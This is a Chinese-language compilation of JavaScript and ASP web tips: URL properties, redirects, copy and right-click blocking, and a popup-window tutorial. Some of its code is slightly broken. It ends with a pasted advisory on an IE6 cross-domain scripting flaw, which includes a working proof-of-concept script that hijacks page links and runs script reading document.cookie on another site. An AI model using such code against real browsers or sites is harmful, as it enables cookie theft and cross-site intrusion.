javascript得到本頁地址

window.open是出現新的視窗，而location.href是本視窗重新整理為新的網址
location.href    /EquipmentWeb/

如果擷取“當前”網域名稱
host = window.location.host;

 

url=document.domain;

 

url = window.location.href;

取得完整url路徑: 用以下代碼可以完整研證結果:

<table width=100% cellpadding=0 cellspacing=0 border=0 >
<script> 
thisURL = document.URL; 
thisHREF = document.location.href; 
thisSLoc = self.location.href; 
thisDLoc = document.location; 
strwrite = "<tr><td valign=top>thisURL: </td><td>[" + thisURL + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisHREF: </td><td>[" + thisHREF + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisSLoc: </td><td>[" + thisSLoc + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisDLoc: </td><td>[" + thisDLoc + "]</td></tr>" 
document.write( strwrite ); 
</script> 
thisDLoc = document.location; <BR>
thisURL = document.URL; <BR>
thisHREF = document.location.href; <BR>
thisSLoc = self.location.href;<BR>
<script> 
thisTLoc = top.location.href; 
thisPLoc = parent.document.location; 
thisTHost = top.location.hostname; 
thisHost = location.hostname; 
strwrite = "<tr><td valign=top>thisTLoc: </td><td>[" + thisTLoc + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisPLoc: </td><td>[" + thisPLoc + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisTHost: </td><td>[" + thisTHost + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisHost: </td><td>[" + thisHost + "]</td></tr>" 
document.write( strwrite ); 
</script> 
thisTLoc = top.location.href; <BR>
thisPLoc = parent.document.location; <BR>
thisTHost = top.location.hostname; <BR>
thisHost = location.hostname;<BR>
<script> 
tmpHPage = thisHREF.split( "/" ); 
thisHPage = tmpHPage[ tmpHPage.length-1 ]; 
tmpUPage = thisURL.split( "/" ); 
thisUPage = tmpUPage[ tmpUPage.length-1 ]; 
strwrite = "<tr><td valign=top>thisHPage: </td><td>[" + thisHPage + "]</td></tr>" 
strwrite += "<tr><td valign=top>thisUPage: </td><td>[" + thisUPage + "]</td></tr>" 
document.write( strwrite ); 
</script><tr><td>

 

運行如下: thisDLoc = document.location;
thisURL = document.URL;
thisHREF = document.location.href;
thisSLoc = self.location.href;
thisTLoc = top.location.href;
thisPLoc = parent.document.location;
thisTHost = top.location.hostname;
thisHost = location.hostname;

 

 

 

 

在寫ASP.NET程式的時候，我們經常遇到跳轉頁面的問題，我們經常使用Response.Redirect ，如果客戶要在跳轉的時候使用提示，這個就不靈光了，如：

Response.Write("<script>alert('恭喜您，註冊成功！');</script>");
Response.Redirect("main.html");

這時候我們的提示內容沒有出來就跳轉了，和Response.Redirect("main.html");沒有任何區別。

這時我們採用下面代碼實驗一下：

Response.Write("<script language=javascript>alert('恭喜您，註冊成功！')</script>");
Response.Write("<script language=javascript>window.location.href='main.html'</script>");

這個即實現了我們的要求，在提示後，跳轉頁面。

最重要的是window.location.href 語句可以實現一個架構的頁面在執行伺服器端代碼後重新整理另一個架構的頁面(Response.Redirect無法達到，至少我沒有發現)：

如：index.htm頁面中有二個架構，分別為 frameLeft和frameRight，在frameRight頁面中執行伺服器端代碼後重新整理frameLeft中的頁面。

先前最常見的是註冊之後，自動重新整理登陸框，讓登陸框換成已登陸頁面，只要在註冊成功的代碼之後加上一段，即可以實現重新整理另個架構的頁面。代碼如下：

Response.Write("<script language=javascript>alert('恭喜您，註冊成功！')</script>");
Response.Write("<script language=javascript>window.parent.frameLeft.location.href='main.html'</script>");
 
1. oncontextmenu=window.event.returnvalue=false 將徹底屏蔽滑鼠右鍵
<table border oncontextmenu=return(false)><td>no</table> 可用於Table

2. <body onselectstart=return false> 取消選取、防止複製

3. onpaste=return false 不準粘貼

4. oncopy=return false; oncut=return false; 防止複製

5. <link rel=Shortcut Icon href=../../../favicon.ico> IE地址欄前換成自己的表徵圖

6. <link rel=Bookmark href=../../../favicon.ico> 可以在收藏夾中顯示出你的表徵圖

7. <input style=ime-mode:disabled> 關閉IME

8. 永遠都會帶著架構
<script language=javascript><!--
if (window == top)top.location.href = frames.htm; //frames.htm為框架頁
// --></script>

9. 防止被人frame
<SCRIPT LANGUAGE=javascript><!--
if (top.location != self.location)top.location=self.location;
// --></SCRIPT>

10. <noscript><iframe src=../../../*.html></iframe></noscript> 網頁將不能被另存新檔

11. <input type=button value=查看網頁原始碼
onclick=window.location = 'view-source:'+ 'http://www.csdn.net/'>

12. 怎樣通過asp的手段來檢查來訪者是否用了代理
<% if Request.ServerVariables(HTTP_X_FORWARDED_FOR)<> then
response.write "<font color=#FF0000>您通過了Proxy 伺服器， _
真實的IP為"&Request.ServerVariables(HTTP_X_FORWARDED_FOR)
end if
%>

 

經常上網的朋友可能會到過這樣一些網站，一進入首頁立刻會彈出一個視窗，或者按一個串連或
按鈕彈出，通常在這個視窗裡會顯示一些注意事項、著作權資訊、警告、歡迎光顧之類的話或者作
者想要特別提示的資訊。其實製作這樣的頁面效果非常的容易，只要往該頁面的HTML裡加入幾段
javascript代碼即可實現。下面俺就帶您剖析它的奧秘。
【1、最基本的快顯視窗代碼】
  其實代碼非常簡單：
  <SCRIPT LANGUAGE="javascript">
<!--
window.open ('page.html')
-->
</SCRIPT>
  因為這是一段javascripts代碼，所以它們應該放在<SCRIPT LANGUAGE="javascript">之間。<!--
和 -->是對一些版本低的瀏覽器起作用，在這些老瀏覽器中不會將標籤中的代碼作為文本顯示出
來。要養成這個好習慣啊。
  window.open ('page.html') 用於控制彈出新的視窗page.html，如果page.html不與主視窗在同
一路徑下，前面應寫明路徑，絕對路徑(http://)和相對路徑(../)均可。
用單引號和雙引號都可以，只是不要混用。
  這一段代碼可以加入HTML的任意位置，<head>和</head>之間可以，<body>間</body>也可以，越
前越早執行，尤其是頁面代碼長，又想使頁面早點彈出就盡量往前放。也可以，越前越早執行，
尤其是頁面代碼長，又想使頁面早點彈出就盡量往前放。
  【2、經過設定後的快顯視窗】
  下面再說一說快顯視窗的設定。只要再往上面的代碼中加一點東西就可以了。我們來定製這個彈
出的視窗的外觀，尺寸大小，彈出的位置以適應該頁面的具體情況。
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('page.html', 'newwindow', 'height=100, width=400, top=0,left=0,
toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no,status=no')
//寫成一行
-->
</SCRIPT>
  參數解釋：
  <SCRIPT LANGUAGE="javascript"> js指令碼開始；
window.open 彈出新視窗的命令；
'page.html' 快顯視窗的檔案名稱；
'newwindow' 快顯視窗的名字（不是檔案名稱），非必須，可用空''代替；
height=100 視窗高度；
width=400 視窗寬度；
top=0 視窗距離螢幕上方的象素值；
left=0 視窗距離螢幕左側的象素值；
toolbar=no 是否顯示工具列，yes為顯示；
menubar，scrollbars 表示功能表列和滾動欄。
resizable=no 是否允許改變視窗大小，yes為允許；
location=no 是否顯示地址欄，yes為允許；
status=no 是否顯示狀態列內的資訊（通常是檔案已經開啟），yes為允許；
</SCRIPT> js指令碼結束
  【3、用函數控制快顯視窗】
  下面是一個完整的代碼：
  <html>
<head>
<script LANGUAGE="javascript">
<!--
function openwin() {
window.open ("page.html", "newwindow", "height=100, width=400,
toolbar=no,menubar=no, scrollbars=no, resizable=no, location=no, status=no")
//寫成一行
}
//-->
</script>
</head>
<body >
  ...任意的頁面內容...
  </body>
</html>
　 這裡定義了一個函數openwin(),函數內容就是開啟一個視窗。在調用它之前沒有任何用途。
怎麼調用呢？
　 方法一：<body > 瀏覽器讀頁面時快顯視窗；
　 方法二：<body > 瀏覽器離開頁面時快顯視窗；
　 方法三：用一個串連調用：<a href="#" >開啟一個視窗</a>
注意：使用的“#”是虛串連。
　 方法四：用一個按鈕調用：<input type="button"  value="開啟窗
口">
  【4、同時彈出2個視窗】
  對原始碼稍微改動一下：
<script LANGUAGE="javascript">
<!--
function openwin() {
window.open ("page.html", "newwindow", "height=100, width=100,
top=0,left=0,toolbar=no, menubar=no, scrollbars=no, resizable=no,
location=no,status=no")
//寫成一行
window.open ("page2.html", "newwindow2", "height=100, width=100,
top=100,left=100,toolbar=no, menubar=no, scrollbars=no, resizable=no,
location=no,status=no")
//寫成一行
}
//-->
</script>
　 為避免彈出的2個視窗覆蓋，用top和left控制一下彈出的位置不要相互覆蓋即可。最後用上面
說過的四種方法調用即可。
注意：2個視窗的name(newwindows和newwindow2)不要相同，或者乾脆全部為空白。OK？
【5、主視窗開啟檔案1.htm，同時彈出小視窗page.html】
  如下代碼加入主視窗<head>區：
<script language="javascript">
<!--
function openwin() {
window.open("page.html","","width=200,height=200")
}
//-->
</script>
加入<body>區：
<a href="1.htm" >open</a>即可。
  【6、彈出的視窗之定時關閉控制】
  下面我們再對彈出的視窗進行一些控制，效果就更好了。如果我們再將一小段代碼加入彈出的頁
面(注意是加入到page.html的HTML中，可不是首頁面中，否則...)，讓它10秒後自動關閉是不是
更酷了？
首先，將如下代碼加入page.html檔案的<head>區：
<script language="javascript">
function closeit() {
setTimeout("self.close()",10000) //毫秒
}
</script>
然後，再用<body > 這一句話代替page.html中原有的<BODY>這一句就可以
了。(這一句話千萬不要忘記寫啊！這一句的作用是調用關閉視窗的代碼，10秒鐘後就自行關閉該
視窗。)
【7、在快顯視窗中加上一個關閉按鈕】
  <form>
<INPUT TYPE='BUTTON' value='關閉' onClick='window.close()'>
</form>
  呵呵，現在更加完美了！
  【8、內包含的快顯視窗-－－一個頁面兩個視窗】
  上面的例子都包含兩個視窗，一個是主視窗，另一個是彈出的小視窗。通過下面的例子，你可以
在一個頁面內完成上面的效果。
<html>
<head>
<SCRIPT LANGUAGE="javascript">
function openwin()
{
OpenWindow=window.open("", "newwin", "height=250,
width=250,toolbar=no,scrollbars="+scroll+",menubar=no");
//寫成一行
OpenWindow.document.write("<TITLE>例子</TITLE>")
OpenWindow.document.write("<BODY BGCOLOR=#ffffff>")
OpenWindow.document.write("<h1>Hello!</h1>")
OpenWindow.document.write("New window opened!")
OpenWindow.document.write("</BODY>")
OpenWindow.document.write("</HTML>")
OpenWindow.document.close()
}
</SCRIPT>
</head>
<body>
<a href="#" >開啟一個視窗</a>
<input type="button"  value="開啟視窗">
</body>
</html>
  看看OpenWindow.document.write()裡面的代碼不就是標準的HTML嗎？只要按照格式寫更多的行即
可。千萬注意多一個標籤或少一個標籤就會出現錯誤。記得用OpenWindow.document.close()結束
啊。
【9、終極應用--彈出的視窗之Cookie控制】
  回想一下，上面的快顯視窗雖然酷，但是有一點小毛病(沉浸在喜悅之中，一定沒有發現吧？)比
如你將上面的指令碼放在一個需要頻繁經過的頁面裡(例如首頁)，那麼每次重新整理這個頁面，視窗都
會彈出一次，是不是非常煩人？:-(
有解決的辦法嗎？當然有！我們使用cookie來控制一下就可以了。首先，將如下代碼加入首頁面
HTML的<HEAD>區：
<script>
function openwin(){
window.open("page.html","","width=200,height=200")
}
function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (documents.cookie.length > 0) {
offset = documents.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = documents.cookie.indexOf(";", offset);
if (end == -1)
end = documents.cookie.length;
returnvalue=unescape(documents.cookie.substring(offset, end))
}
}
return returnvalue;
}
function loadpopup(){
if (get_cookie('popped')==''){
openwin()
documents.cookie="popped=yes"
}
}
</script>
　 然後，用<body >（注意不是openwin而是loadpop啊！）替換首頁面中
原有的<BODY>這一句即可。你可以試著重新整理一下這個頁面或重新進入該頁面，視窗再也不會彈出
了。真正的Pop-Only-Once！

受影響系統：

Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2

描述：BUGTRAQ ID: 29960

Internet Explorer是微軟發布的非常流行的WEB瀏覽器。

IE沒有正確地處理視窗對象的location或location.href屬性，如果使用者受騙訪問了惡意網站的話，就會繞過跨域安全限制，在使用者瀏覽器會話中執行任意指令。

這個跨域安全問題的本質是瀏覽器在處理window對象的操作有所疏漏，沒有考慮清楚不同域有繼承關係的window對象操作後的變化，只是對window對象的一些方法的參數做了類似資料類型的限制，導致最後繞過限制跨域執行了指令碼。

 

<*來源：rayh4c （rayh4c@80sec.com）

連結：http://secunia.com/advisories/30857/
http://blogs.zdnet.com/security/?p=1348
http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt
http://www.kb.cert.org/vuls/id/923508
*>

測試方法：

警 告

以下程式(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open('http://www.phpwind.net&#39;);
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links.href="javascript:win()"
}
}
</script>

建議：廠商補丁：

Microsoft
---------
目前廠商還沒有提供補丁或者升級程式，我們建議使用此軟體的使用者隨時關注廠商的首頁以擷取最新版本：

http://www.microsoft.com/windows/ie/default.asp